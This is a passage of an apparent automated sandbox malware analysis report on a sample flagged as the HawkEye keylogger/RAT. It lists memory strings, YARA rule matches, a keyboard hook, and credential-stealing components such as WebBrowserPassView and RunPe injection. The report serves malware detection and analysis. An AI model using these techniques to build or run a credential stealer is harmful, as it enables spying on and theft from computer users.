            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: InstallUtil.exe, 0000000C.00000002.612022947.0000000006F52000.00000004.00000001.sdmp, InstallUtil.exe, 0000000C.00000003.455377795.0000000005D47000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: InstallUtil.exe, 0000000C.00000003.455377795.0000000005D47000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnm
            Source: vbc.exe, 00000012.00000003.493497095.00000000022DC000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
            Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: ypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
            Source: ypBoHI5G3x.exe, 00000001.00000002.447965365.0000000003121000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
            Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY
            Contains functionality to log keystrokes (.Net Source)Show sources
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_0040D674 OpenClipboard,GetLastError,DeleteFileW,

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large array initializationsShow sources
            Source: ypBoHI5G3x.exe, n6QE/Nx78.csLarge array initialization: .cctor: array initializer size 7987
            Source: 1.2.ypBoHI5G3x.exe.c30000.0.unpack, n6QE/Nx78.csLarge array initialization: .cctor: array initializer size 7987
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA5CBC CreateProcessAsUserW,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FF51F7
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FF0040
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FFF378
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FFB240
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FFB230
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FF2DE8
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FF2DD8
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FFAC90
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FFAC7F
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_05FF4968
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA7F50
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DABF48
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA5470
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA6C29
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA9A10
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DAE958
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DAA141
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA6130
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA5461
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DAF588
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DACA88
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DAB3C8
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DAB3B8
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA2370
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA2360
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DAB840
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DAD810
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DAB833
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA3998
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA3996
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeCode function: 1_2_06DA3958
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_008B20B0
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_0516F90C
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_0516F934
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_0516F958
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_0516F940
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_0516F94C
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_05175EDF
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_0517CA22
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_0517BA60
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_073AB4E0
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_073AEEC8
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_073ABDB0
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_073AB198
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 12_2_073A0006
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00404419
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00404516
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00413538
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004145A1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_0040E639
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004337AF
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004399B1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_0043DAE7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00405CF6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00403F85
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00411F99
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_00404DDB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_0040BD8A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_00404E4C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_00404EBD
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_00404F4E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\InstallUtil.exe 46DEE184523A584E56DF93389F81992911A1BA6B1F05AD7D803C6AB1450E18CB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
            Source: ypBoHI5G3x.exeBinary or memory string: OriginalFilename vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.448095558.00000000031D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPe6.dll" vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.463314966.000000000768B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInstallUtil.exeT vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.455250431.0000000004128000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSHCore1.dll0 vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000002.460808162.0000000006B10000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exe, 00000001.00000000.331669031.0000000000C32000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSchool Store.exe: vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exeBinary or memory string: OriginalFilenameSchool Store.exe: vs ypBoHI5G3x.exe
            Source: ypBoHI5G3x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 12.2.InstallUtil.exe.7750000.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.2b6ec2c.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.8110000.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
